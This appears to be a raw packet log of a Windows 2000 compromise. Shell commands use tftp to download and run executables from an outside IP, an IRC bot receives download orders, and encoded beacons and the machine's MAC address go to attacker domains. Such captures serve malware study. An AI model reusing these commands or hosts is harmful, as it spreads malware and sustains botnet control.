VICTIM: Microsoft Windows 2000 [Version 5.00.2195] VICTIM: (C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> VICTIM: dir wins\\dllhost.exe VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32> VICTIM: dir dllcache\\tftpd.exe VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32> VICTIM: tftp -i 175.123.78.131 get svchost.exe wins\\SVCHOST.EXE VICTIM: \000\001svchost.exe\000octet\000 VICTIM: \000\001svchost.exe\000octet\000 VICTIM: \000\001svchost.exe\000octet\000 VICTIM: \000\004\000\001 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000\002 VICTIM: \000\004\000\003 VICTIM: \000\004\000\004 VICTIM: \000\004\000\005 VICTIM: \000\004\000\006 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000\007 VICTIM: \000\004\000\010 VICTIM: \000\004\000\t VICTIM: \000\004\000 VICTIM: \000\004\000\013 VICTIM: \000\004\000\014 VICTIM: \000\004\000 VICTIM: \000\004\000\016 VICTIM: \000\004\000\017 VICTIM: \000\004\000\020 VICTIM: \000\004\000\021 VICTIM: \000\004\000\022 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000\023 VICTIM: \000\004\000\024 VICTIM: \000\004\000\025 VICTIM: \000\004\000\026 VICTIM: \000\004\000\027 VICTIM: \000\004\000\030 VICTIM: \000\004\000\031 VICTIM: \000\004\000\032 VICTIM: \000\004\000\033 VICTIM: \000\004\000\034 VICTIM: \000\004\000\035 VICTIM: \000\004\000\036 VICTIM: \000\004\000\037 VICTIM: \000\004\000 VICTIM: \000\004\000! VICTIM: \000\004\000\ VICTIM: \000\004\000# VICTIM: \000\004\000\$ VICTIM: \000\004\000% VICTIM: \000\004\000& VICTIM: \000\004\000' VICTIM: \000\004\000( VICTIM: \000\004\000) VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000* VICTIM: \000\004\000+ VICTIM: \000\004\000, VICTIM: \000\004\000- VICTIM: \000\004\000. VICTIM: \000\004\000/ VICTIM: \000\004\0000 VICTIM: \000\004\0001 VICTIM: \000\004\0002 VICTIM: \000\004\0003 VICTIM: \000\004\0004 VICTIM: \000\004\0005 VICTIM: \000\004\0006 VICTIM: \000\004\0007 VICTIM: \000\004\0008 VICTIM: \000\004\0009 VICTIM: \000\004\000: VICTIM: \000\004\000; VICTIM: \000\004\000< VICTIM: \000\004\000= VICTIM: \000\004\000> VICTIM: \000\004\000? VICTIM: \000\004\000@ VICTIM: \000\004\000A VICTIM: \000\004\000B VICTIM: \000\004\000C VICTIM: \000\004\000D VICTIM: \000\004\000E VICTIM: \000\004\000F VICTIM: \000\004\000G VICTIM: \000\004\000H VICTIM: \000\004\000I VICTIM: \000\004\000J VICTIM: \000\004\000K VICTIM: \000\004\000L VICTIM: \000\004\000M VICTIM: \000\004\000N VICTIM: \000\004\000O VICTIM: \000\004\000P VICTIM: \000\004\000Q VICTIM: \000\004\000R VICTIM: \000\004\000S VICTIM: \000\004\000T VICTIM: \000\004\000U VICTIM: \000\004\000V VICTIM: \000\004\000W VICTIM: \000\004\000X VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000Y VICTIM: \000\004\000Z VICTIM: \000\004\000[ VICTIM: \000\004\000\\ VICTIM: \000\004\000] VICTIM: \000\004\000^ VICTIM: \000\004\000_ VICTIM: \000\004\000` VICTIM: \000\004\000a VICTIM: \000\004\000b VICTIM: \000\004\000c VICTIM: \000\004\000d VICTIM: \000\004\000e VICTIM: \000\004\000f VICTIM: \000\004\000g VICTIM: \000\004\000h VICTIM: \000\004\000i VICTIM: \000\004\000j VICTIM: \000\004\000k VICTIM: Transfer successful: 54544 bytes in 23 seconds, 2371 bytes/s VICTIM: C:\\WINNT\\system32> VICTIM: \000\001dllhost.exe\000octet\000 VICTIM: tftp -i 175.123.78.131 get dllhost.exe wins\\DLLHOST.EXE VICTIM: \000\001dllhost.exe\000octet\000 VICTIM: \000\004\000\001 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000\002 VICTIM: \000\004\000\003 VICTIM: \000\004\000\004 VICTIM: \000\004\000\005 VICTIM: \000\004\000\006 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000\007 VICTIM: \000\004\000\010 VICTIM: \000\004\000\t VICTIM: \000\004\000 VICTIM: \000\004\000\013 VICTIM: \000\004\000\014 VICTIM: \000\004\000 VICTIM: \000\004\000\016 VICTIM: \000\004\000\017 VICTIM: \000\004\000\020 VICTIM: \000\004\000\021 VICTIM: \000\004\000\022 VICTIM: \000\005\000\005unexpected port number\000 VICTIM: \000\004\000\023 VICTIM: \000\004\000\024 VICTIM: \000\004\000\025 VICTIM: \000\004\000\026 VICTIM: \000\004\000\027 VICTIM: \000\004\000\030 VICTIM: \000\004\000\031 VICTIM: \000\004\000\032 VICTIM: \000\004\000\033 VICTIM: \000\004\000\034 VICTIM: \000\004\000\035 VICTIM: \000\004\000\036 VICTIM: \000\004\000\037 VICTIM: \000\004\000 VICTIM: \000\004\000! VICTIM: \000\004\000\ VICTIM: \000\004\000# VICTIM: \000\004\000\$ VICTIM: \000\004\000% VICTIM: \000\004\000& VICTIM: \000\004\000' VICTIM: \000\004\000( VICTIM: Transfer successful: 19968 bytes in 8 seconds, 2496 bytes/s VICTIM: C:\\WINNT\\system32> VICTIM: wins\\DLLHOST.EXE VICTIM: NICK nyuwspwoUSER c020500 . . :- VICTIM: Service Pack 2JOIN &virtu ATTACKER: :u. PRIVMSG nyuwspwo :!get http:/88.perfectexe.com:88/kp.jpg:u. PRIVMSG nyuwspwo :!get http:/kakzhe.com/ml2.txt VICTIM: GET /kp.jpg HTTP/1.0User-Agent: DownloadHost: 88.perfectexe.com:88Pragma: no-cache ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B2F69F5DCEECA825FF3F6CDDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5FF432C&v=2&t=0.9644739 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache ATTACKER: GET /ck.jpg?t=0.728512 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 88.perfectexe.com:88Connection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=918F799D4DDD1ABC0C169AB27438498ED11D96FEDDC234AADEED4403974DFCD2E1AA677EE5A42B1F4D2B78E5EED49778AE57A71BB6C589DD390F1CB64DE51F6CA8D582274642EF70457FC6BC6B85ED3244B31C21AFD18F8955F74429648E2F567A2B0B1AAF8FB01F16A51493383864FE47B0D8F726612D0A762FEC834AFCE35D2D28822E9AACF64928123364E22455D4&t=0.7777674 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=CBD59C78F161892F283284AC793575B21DD1C0A8B8A71C823E0D602712C8A38D2962594034755367197FCD504A70F718B8418D31720185D13503DC7671D9017297EA76D3A5A19F00516BD1AB3BD528F716E1A39EA2DC9E98EE4CA4C940AA235A8ADB9584634317B8D46781177A838109CB3E431D85D6B0828E9A483DCA6821DBB6A69733CAFFA462E9D00E5673B4BBC5AC77&t=0.5372888 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache ATTACKER: GET /p6.asp?MAC=00-0C-29-76-27-7E&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: ck.nucleardiscover.com:88 ATTACKER: GET /s5.jpg?t=0.8635218 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 88.perfectexe.com:88Connection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=445A31D570E08F27D0C8A5FC07702DDF099EFDCB39192DBB8CBE2E67B319D4FA94DE5BB6A19BF0C3CCF65338221E776E61965AB0F98D6B395A622C5B8528006B2C633F97F327019E89B34933B25C70AF7A8D023F27596C6AAD0F2B46A34958211041CFDE92B23A959E2DC94EF4F461FB798E86A912554B6C3A630C6369DFC57B85813B92EBDD54EBE0D8530A67A6D457&t=0.6318323 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache ATTACKER: GET /g.php HTTP/1.0Accept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; waoc)Host: s5.perfectexe.com:88Pragma: no-cache ATTACKER: GET /sn.php?c=F9E741A531A1F65E1B03C1983B4C798BEB7C83B5A5856EF8B5876E2749E398B63B710DE0142E7A49083292F9023E766F01F61CF64A3E36643D053542D5784B2017589F37F521148B81BB502A54BAE23D9A6DBB862A54595F8321513CB45E19606F3E4859E1C19E31FA499B0D4EB765EDBC49520C742751631D09037620824CB66B7B9935241731F6291D54014D8EEA96AB74&t=0.7087976 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache ATTACKER: GET /ck2.jpg?t=9.679812E-02 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 88.perfectexe.com:88Connection: Keep-AlivePragma: no-cache ATTACKER: GET / HTTP/1.0Accept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: touristnetworks.comConnection: Keep-Alive ATTACKER: GET /vtrack.php?qry=b38a5345798c4dc4618047987a4f2cd9b3001f7777195a7f5985023cafdd9235a0f968d6aeecdc7275f18296d5c547f0 HTTP/1.0Accept: */*Referer: http:/touristnetworks.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: touristnetworks.comConnection: Keep-AliveCookie: GOSESSION=%7C1303854764.36%3A192.168.1.137%2C0; AAA=1 ATTACKER: GET /sn.php?c=756B1DF9DF4F9647EF021D46D2AA25E04AD43205693A24BA3F09B9FAD7010C2A334D1E062F6DB4D570170864C9D821C8B640D037E78A9FBBF2C7384E98E7107C4D315A23DD05851A6852DEA40BE50BD4E611704D700EC7C12C8E711C39D3463F6435EDFC93B30EA1C87BCE49111179E31DEA4F604E09C3E47D24B3DCD36561DF5A50369F3B099453C0F6441D94503F41&t=0.6957361 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: PONG :k. VICTIM: JOIN &virtu